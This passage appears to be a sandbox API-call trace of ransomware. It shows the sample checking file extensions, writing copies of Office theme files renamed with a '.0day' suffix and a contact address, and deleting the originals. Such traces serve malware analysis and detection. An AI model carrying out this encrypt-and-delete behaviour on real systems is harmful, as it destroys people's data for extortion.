Effects\\Equity.eftx") returned 78 [0272.762] lstrlenW (lpString=".dbf") returned 4 [0272.762] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0272.762] lstrlenW (lpString=".1cd") returned 4 [0272.762] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0272.762] lstrlenW (lpString=".jpg") returned 4 [0272.762] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.763] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.763] lstrlenW (lpString="Essential.eftx") returned 14 [0272.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\essential.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0272.818] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=16350) returned 1 [0272.818] CloseHandle (hObject=0x3a4) returned 1 [0272.818] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\essential.eftx")) returned 0x20 [0272.818] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\essential.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\essential.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0272.818] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.818] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\essential.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0272.818] GetLastError () returned 0x0 [0272.819] ReadFile (in: hFile=0x3a4, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x3fde, lpOverlapped=0x0) returned 1 [0272.821] WriteFile (in: hFile=0x354, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x3fe0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x3fe0, lpOverlapped=0x0) returned 1 [0272.822] ReadFile (in: hFile=0x3a4, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.822] WriteFile (in: hFile=0x354, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0272.822] SetEndOfFile (hFile=0x354) returned 1 [0272.822] CloseHandle (hObject=0x354) returned 1 [0272.822] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.822] SetEndOfFile (hFile=0x3a4) returned 1 [0272.824] CloseHandle (hObject=0x3a4) returned 1 [0272.824] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.824] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\essential.eftx")) returned 1 [0272.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0272.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0272.825] lstrlenW (lpString=".doc") returned 4 [0272.825] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.825] lstrlenW (lpString=".docx") returned 5 [0272.825] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.825] lstrlenW (lpString=".pdf") returned 4 [0272.825] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.825] lstrlenW (lpString=".xls") returned 4 [0272.825] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.825] lstrlenW (lpString=".xlsx") returned 5 [0272.825] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.825] lstrlenW (lpString=".ppt") returned 4 [0272.825] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0272.825] lstrlenW (lpString=".zip") returned 4 [0272.825] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.825] lstrlenW (lpString=".rar") returned 4 [0272.825] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.825] lstrlenW (lpString=".bz2") returned 4 [0272.825] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.825] lstrlenW (lpString=".7z") returned 3 [0272.825] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0272.825] lstrlenW (lpString=".dbf") returned 4 [0272.825] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0272.825] lstrlenW (lpString=".1cd") returned 4 [0272.825] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0272.825] lstrlenW (lpString=".jpg") returned 4 [0272.825] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0272.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0272.826] lstrlenW (lpString=".doc") returned 4 [0272.826] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.826] lstrlenW (lpString=".docx") returned 5 [0272.826] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.826] lstrlenW (lpString=".pdf") returned 4 [0272.826] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.826] lstrlenW (lpString=".xls") returned 4 [0272.826] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.826] lstrlenW (lpString=".xlsx") returned 5 [0272.826] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.826] lstrlenW (lpString=".ppt") returned 4 [0272.826] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0272.826] lstrlenW (lpString=".zip") returned 4 [0272.826] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.826] lstrlenW (lpString=".rar") returned 4 [0272.826] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.826] lstrlenW (lpString=".bz2") returned 4 [0272.826] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.826] lstrlenW (lpString=".7z") returned 3 [0272.826] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0272.826] lstrlenW (lpString=".dbf") returned 4 [0272.826] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0272.826] lstrlenW (lpString=".1cd") returned 4 [0272.826] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81 [0272.826] lstrlenW (lpString=".jpg") returned 4 [0272.826] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.826] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.827] lstrlenW (lpString="Foundry.eftx") returned 12 [0272.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\foundry.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0272.828] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=18226) returned 1 [0272.828] CloseHandle (hObject=0x3a4) returned 1 [0272.828] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\foundry.eftx")) returned 0x20 [0272.828] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\foundry.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\foundry.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0272.828] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.828] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\foundry.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.908] GetLastError () returned 0x0 [0272.909] ReadFile (in: hFile=0x3a4, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x4732, lpOverlapped=0x0) returned 1 [0272.911] WriteFile (in: hFile=0x388, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x4740, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x4740, lpOverlapped=0x0) returned 1 [0272.912] ReadFile (in: hFile=0x3a4, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.912] WriteFile (in: hFile=0x388, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.912] SetEndOfFile (hFile=0x388) returned 1 [0272.912] CloseHandle (hObject=0x388) returned 1 [0272.912] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.912] SetEndOfFile (hFile=0x3a4) returned 1 [0272.916] CloseHandle (hObject=0x3a4) returned 1 [0272.916] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.916] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\foundry.eftx")) returned 1 [0272.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0272.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0272.916] lstrlenW (lpString=".doc") returned 4 [0272.916] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.916] lstrlenW (lpString=".docx") returned 5 [0272.916] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.916] lstrlenW (lpString=".pdf") returned 4 [0272.916] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.916] lstrlenW (lpString=".xls") returned 4 [0272.916] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.916] lstrlenW (lpString=".xlsx") returned 5 [0272.916] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.916] lstrlenW (lpString=".ppt") returned 4 [0272.916] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0272.916] lstrlenW (lpString=".zip") returned 4 [0272.916] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.916] lstrlenW (lpString=".rar") returned 4 [0272.916] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.917] lstrlenW (lpString=".bz2") returned 4 [0272.917] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.917] lstrlenW (lpString=".7z") returned 3 [0272.917] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0272.917] lstrlenW (lpString=".dbf") returned 4 [0272.917] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0272.917] lstrlenW (lpString=".1cd") returned 4 [0272.917] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0272.917] lstrlenW (lpString=".jpg") returned 4 [0272.917] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0272.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0272.917] lstrlenW (lpString=".doc") returned 4 [0272.917] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.917] lstrlenW (lpString=".docx") returned 5 [0272.917] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.917] lstrlenW (lpString=".pdf") returned 4 [0272.917] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.917] lstrlenW (lpString=".xls") returned 4 [0272.917] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.917] lstrlenW (lpString=".xlsx") returned 5 [0272.917] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.917] lstrlenW (lpString=".ppt") returned 4 [0272.917] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0272.917] lstrlenW (lpString=".zip") returned 4 [0272.917] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.917] lstrlenW (lpString=".rar") returned 4 [0272.917] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.917] lstrlenW (lpString=".bz2") returned 4 [0272.917] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.917] lstrlenW (lpString=".7z") returned 3 [0272.917] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0272.918] lstrlenW (lpString=".dbf") returned 4 [0272.918] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0272.918] lstrlenW (lpString=".1cd") returned 4 [0272.918] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0272.918] lstrlenW (lpString=".jpg") returned 4 [0272.918] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.918] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.918] lstrlenW (lpString="Hardcover.eftx") returned 14 [0272.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\hardcover.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0272.964] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=350689) returned 1 [0272.965] CloseHandle (hObject=0x2cc) returned 1 [0272.965] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\hardcover.eftx")) returned 0x20 [0272.973] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\hardcover.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\hardcover.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0272.975] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.975] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.975] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\hardcover.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0272.975] GetLastError () returned 0x0 [0272.975] ReadFile (in: hFile=0x354, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x559e1, lpOverlapped=0x0) returned 1 [0272.985] WriteFile (in: hFile=0x394, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x559f0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x559f0, lpOverlapped=0x0) returned 1 [0272.992] ReadFile (in: hFile=0x354, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.992] WriteFile (in: hFile=0x394, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0272.992] SetEndOfFile (hFile=0x394) returned 1 [0272.992] CloseHandle (hObject=0x394) returned 1 [0272.992] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.992] SetEndOfFile (hFile=0x354) returned 1 [0273.674] CloseHandle (hObject=0x354) returned 1 [0273.676] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.702] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\hardcover.eftx")) returned 1 [0273.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0273.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0273.704] lstrlenW (lpString=".doc") returned 4 [0273.704] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.704] lstrlenW (lpString=".docx") returned 5 [0273.704] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.704] lstrlenW (lpString=".pdf") returned 4 [0273.704] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.704] lstrlenW (lpString=".xls") returned 4 [0273.704] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.704] lstrlenW (lpString=".xlsx") returned 5 [0273.704] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.705] lstrlenW (lpString=".ppt") returned 4 [0273.705] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0273.705] lstrlenW (lpString=".zip") returned 4 [0273.705] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.705] lstrlenW (lpString=".rar") returned 4 [0273.705] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.705] lstrlenW (lpString=".bz2") returned 4 [0273.705] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.705] lstrlenW (lpString=".7z") returned 3 [0273.705] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0273.705] lstrlenW (lpString=".dbf") returned 4 [0273.705] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0273.705] lstrlenW (lpString=".1cd") returned 4 [0273.705] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0273.705] lstrlenW (lpString=".jpg") returned 4 [0273.705] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0273.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0273.705] lstrlenW (lpString=".doc") returned 4 [0273.705] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.705] lstrlenW (lpString=".docx") returned 5 [0273.705] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.705] lstrlenW (lpString=".pdf") returned 4 [0273.705] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.705] lstrlenW (lpString=".xls") returned 4 [0273.705] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.705] lstrlenW (lpString=".xlsx") returned 5 [0273.705] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.706] lstrlenW (lpString=".ppt") returned 4 [0273.706] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0273.706] lstrlenW (lpString=".zip") returned 4 [0273.706] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.706] lstrlenW (lpString=".rar") returned 4 [0273.706] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.706] lstrlenW (lpString=".bz2") returned 4 [0273.706] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.706] lstrlenW (lpString=".7z") returned 3 [0273.706] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0273.706] lstrlenW (lpString=".dbf") returned 4 [0273.706] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0273.706] lstrlenW (lpString=".1cd") returned 4 [0273.706] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81 [0273.706] lstrlenW (lpString=".jpg") returned 4 [0273.706] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.706] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0273.706] lstrlenW (lpString="Module.eftx") returned 11 [0273.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\module.eftx"), 